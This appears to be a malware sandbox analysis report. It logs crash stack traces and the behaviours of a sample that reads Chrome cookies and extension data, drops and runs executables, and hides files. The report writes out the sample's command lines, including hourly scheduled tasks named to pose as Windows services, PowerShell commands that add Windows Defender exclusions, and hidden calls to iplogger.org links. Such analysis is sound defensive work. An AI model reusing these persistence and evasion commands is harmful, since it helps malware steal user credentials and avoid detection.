registers.esp: 72669200 registers.edi: 1965816336 registers.eax: 72669200 registers.ebp: 72669280 registers.edx: 1 registers.ebx: 109954708 registers.esi: 2147746133 registers.ecx: 3681449241	1	0	0

Application Crash

Process iexplore.exe with pid 2480 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 13, 2022, 8:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x752d4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74ddef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74dd6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74df5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74e706b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x753ad7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x753ad876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x753addd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x752c8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x752c8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x752c950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x753adccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x753adb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x753ae1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x752c9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x752c9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7559788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7528a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7528853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7528a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7529cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7529d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 131331100
registers.edi: 6821756
registers.eax: 131331100
registers.ebp: 131331180
registers.edx: 523248241
registers.ebx: 131331464
registers.esi: 2147746133
registers.ecx: 91117656

__exception__

Aug. 13, 2022, 8:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x753af725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74df414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7527fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x753aa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7678e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x767672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7675ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7675ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x767587f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7675ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75597bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7678516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x767850ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7675a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76759b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76759aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7678530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x767857a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7266540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x726652ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72740ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77317e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x772f54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 72669200
registers.edi: 1965816336
registers.eax: 72669200
registers.ebp: 72669280
registers.edx: 1
registers.ebx: 109954708
registers.esi: 2147746133
registers.ecx: 3681449241

Steals private information from local Internet browsers (50 out of 3942 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\nl\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\hi\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\hu\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\is\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\hu\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\IndexedDB\chrome-extension_oeljdldpnmdbchonielidgobddffflal_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\sk\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\manifest.fingerprint\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCK\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\da\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies

Creates executable files on the filesystem (13 events)

file	C:\Program Files (x86)\Company\NewProduct\tag.exe
file	C:\Program Files (x86)\Company\NewProduct\jshainx.exe
file	C:\Program Files (x86)\Company\NewProduct\WW1.exe
file	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
file	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
file	C:\Program Files (x86)\Company\NewProduct\real.exe
file	C:\ProgramData\Dllhost\winlogson.exe
file	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
file	C:\ProgramData\Dllhost\dllhost.exe
file	C:\Program Files (x86)\Company\NewProduct\safert44.exe
file	C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe
file	C:\Program Files (x86)\Company\NewProduct\rawxdev.exe
file	C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe

Creates hidden or system file (12 events)

Time & API	Arguments	Status	Return
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\ filepath: C:\ProgramData\SystemFiles\	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\sys_rh.bin filepath: C:\ProgramData\SystemFiles\sys_rh.bin	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\sys_rh.bin filepath: C:\ProgramData\sys_rh.bin	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roamingsys_rh.bin filepath: C:\Users\test22\AppData\Roamingsys_rh.bin	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\sys_rh.bin filepath: C:\Users\test22\AppData\Local\Temp\sys_rh.bin	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\dllhost.exe filepath: C:\ProgramData\Dllhost\dllhost.exe	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\config.json filepath: C:\ProgramData\SystemFiles\config.json	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW Aug. 13, 2022, 8:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\winlogson.exe filepath: C:\ProgramData\Dllhost\winlogson.exe	1	1
SetFileAttributesW Aug. 13, 2022, 8:37 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\config.json filepath: C:\ProgramData\SystemFiles\config.json	1	1

Creates a shortcut to an executable file (13 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Word 2013.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk

Creates a suspicious process (29 events)

cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Drops a binary and executes it (12 events)

file	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
file	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
file	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
file	C:\Program Files (x86)\Company\NewProduct\real.exe
file	C:\Program Files (x86)\Company\NewProduct\safert44.exe
file	C:\Program Files (x86)\Company\NewProduct\tag.exe
file	C:\Program Files (x86)\Company\NewProduct\jshainx.exe
file	C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe
file	C:\Program Files (x86)\Company\NewProduct\rawxdev.exe
file	C:\Program Files (x86)\Company\NewProduct\WW1.exe
file	C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe
file	C:\ProgramData\Dllhost\winlogson.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe

A process created a hidden window (33 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1AbtZ4 parameters: filepath: https://iplogger.org/1AbtZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1AbtZ4 parameters: filepath: https://iplogger.org/1AbtZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RyjC4 parameters: filepath: https://iplogger.org/1RyjC4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RyjC4 parameters: filepath: https://iplogger.org/1RyjC4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1A4aK4 parameters: filepath: https://iplogger.org/1A4aK4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1A4aK4 parameters: filepath: https://iplogger.org/1A4aK4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RLtX4 parameters: filepath: https://iplogger.org/1RLtX4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RLtX4 parameters: filepath: https://iplogger.org/1RLtX4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RCgX4 parameters: filepath: https://iplogger.org/1RCgX4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1RCgX4 parameters: filepath: https://iplogger.org/1RCgX4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1nhGL4 parameters: filepath: https://iplogger.org/1nhGL4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1nhGL4 parameters: filepath: https://iplogger.org/1nhGL4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1A3AZ4 parameters: filepath: https://iplogger.org/1A3AZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1A3AZ4 parameters: filepath: https://iplogger.org/1A3AZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1ALSZ4 parameters: filepath: https://iplogger.org/1ALSZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: https://iplogger.org/1ALSZ4 parameters: filepath: https://iplogger.org/1ALSZ4	1	1
ShellExecuteExW Aug. 13, 2022, 8:13 p.m.	show_type: 0 filepath_r: 4444444444444 parameters: filepath: 4444444444444		0
